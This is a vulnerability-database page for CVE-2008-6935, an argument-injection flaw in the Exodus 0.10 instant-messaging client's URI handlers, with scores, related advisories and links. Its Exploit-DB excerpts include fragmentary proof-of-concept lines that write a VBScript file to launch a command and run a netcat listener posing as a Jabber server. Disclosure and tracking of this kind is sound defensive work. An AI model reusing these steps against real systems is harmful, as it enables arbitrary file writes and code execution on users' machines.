CVE-2008-6935
published 2009-08-11CVE-2008-6935: Argument injection vulnerability in Exodus 0.10 allows remote attackers to inject arbitrary command line arguments, overwrite arbitrary files, and cause a…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
5.38%
91.7th percentile
Argument injection vulnerability in Exodus 0.10 allows remote attackers to inject arbitrary command line arguments, overwrite arbitrary files, and cause a denial of service via encoded spaces in an im:// URI.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jabber | exodus | — | — |
| joe_fuhrman | exodus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-28rv-fmvr-x8j4: Argument injection vulnerability in Exodus 0
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2008-6937 [CRITICAL] CWE-94 GHSA-28rv-fmvr-x8j4: Argument injection vulnerability in Exodus 0
Argument injection vulnerability in Exodus 0.10 allows remote attackers to inject arbitrary command line arguments, overwrite arbitrary files, and cause a denial of service via encoded spaces in an xmpp:// URI, a different vector than CVE-2008-6935 and CVE-2008-6936. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
GHSA
GHSA-jqx5-rg54-8gq4: Argument injection vulnerability in Exodus 0
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2008-6936 [CRITICAL] CWE-94 GHSA-jqx5-rg54-8gq4: Argument injection vulnerability in Exodus 0
Argument injection vulnerability in Exodus 0.10 allows remote attackers to inject arbitrary command line arguments, overwrite arbitrary files, and cause a denial of service via encoded spaces in a pres:// URI, a different vector than CVE-2008-6935.
GHSA
GHSA-68c6-3m87-9qj2: Argument injection vulnerability in Exodus 0
ghsa_unreviewed·2022-05-14
CVE-2008-6935 [HIGH] CWE-94 GHSA-68c6-3m87-9qj2: Argument injection vulnerability in Exodus 0
Argument injection vulnerability in Exodus 0.10 allows remote attackers to inject arbitrary command line arguments, overwrite arbitrary files, and cause a denial of service via encoded spaces in an im:// URI.
No detection rules found.
Exploit-DB
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
exploitdb·2008-11-20
CVE-2008-6937 Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)
---
> testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^ >> testfile
nc -L -s 192.168.0.1 -p 5222 -vv
click me
click me
# milw0rm.com [2008-11-20]
Exploit-DB
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)
exploitdb·2008-11-17
CVE-2008-6937 Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)
Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)
---
Exodus v0.10 uri handler arbitrary parameter injection
by Nine:Situations:Group::strawdog
tested against IE8b/xpsp3
may not work against non-English systems because of an installation bug
software site: http://code.google.com/p/exodus/
description:
Exodus is a free software instant messaging client developed by Peter
Millard and written in Borland Delphi that can connect to Jabber servers
and exchange messages with other Jabber users. Currently, binaries are
only available for Microsoft Windows. Exodus was designed as the official
successor of the Winjab client, as Winjab was a personal project that
was becoming too difficult to maintain[..]
reg key:
HKEY_CLASSES_ROOT\im\shell\Open\command
C:\Program Files\Exodus\Exodus.exe
No writeups or analysis indexed.
http://osvdb.org/49888http://retrogod.altervista.org/exodus_uri.htmlhttp://secunia.com/advisories/32729http://www.securityfocus.com/archive/1/498389/100/0/threadedhttp://www.securityfocus.com/bid/32330http://www.vupen.com/english/advisories/2008/3191https://exchange.xforce.ibmcloud.com/vulnerabilities/46663https://www.exploit-db.com/exploits/7145https://www.exploit-db.com/exploits/7167http://osvdb.org/49888http://retrogod.altervista.org/exodus_uri.htmlhttp://secunia.com/advisories/32729http://www.securityfocus.com/archive/1/498389/100/0/threadedhttp://www.securityfocus.com/bid/32330http://www.vupen.com/english/advisories/2008/3191https://exchange.xforce.ibmcloud.com/vulnerabilities/46663https://www.exploit-db.com/exploits/7145https://www.exploit-db.com/exploits/7167
2009-08-11
Published